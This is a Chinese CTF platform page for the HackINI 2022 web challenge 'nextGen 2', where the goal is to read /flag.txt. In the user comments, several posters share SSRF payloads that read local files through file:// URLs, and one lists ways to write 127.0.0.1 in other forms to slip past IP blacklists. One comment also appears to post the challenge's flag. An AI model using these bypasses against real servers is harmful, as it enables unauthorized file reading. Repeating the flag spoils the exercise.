nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1113
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
Aerelin 1月前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 3月前

service=file://127.0.0.01/flag.txt

回复 0

bugku111222 5月前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0

零基础110 5月前

shellmates{**********}

回复 0

2ew123123124 5月前

shellmates{******}

回复 0

lunarbyside 6月前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 2

脆脆sha_ 1年前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 4月前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 3

MOCHAOLIN 1年前

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

868954104 1年前

shellmates{Y0u_d1D_1t_aG4iN_!!} service=file://2130706433/flag.txt

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

out不慢 攻破了该题 21小时前
15206540508 攻破了该题 1天前
liang123456 攻破了该题 1天前
lqianqian 攻破了该题 2天前
16690595968 攻破了该题 2天前
miraiz\ 攻破了该题 2天前
Jinctf 攻破了该题 4天前
all423 攻破了该题 7天前
cthugha721 攻破了该题 7天前
caocao 攻破了该题 8天前
oomi 攻破了该题 8天前
MuMu123 攻破了该题 8天前
11223 攻破了该题 8天前
minz 攻破了该题 9天前
ndaygril 攻破了该题 10天前
燃燃然燃 攻破了该题 10天前
宇文成都 攻破了该题 10天前
zhenmingshui 攻破了该题 10天前
Ethan552525 攻破了该题 10天前
水晶兰 攻破了该题 11天前
问题反馈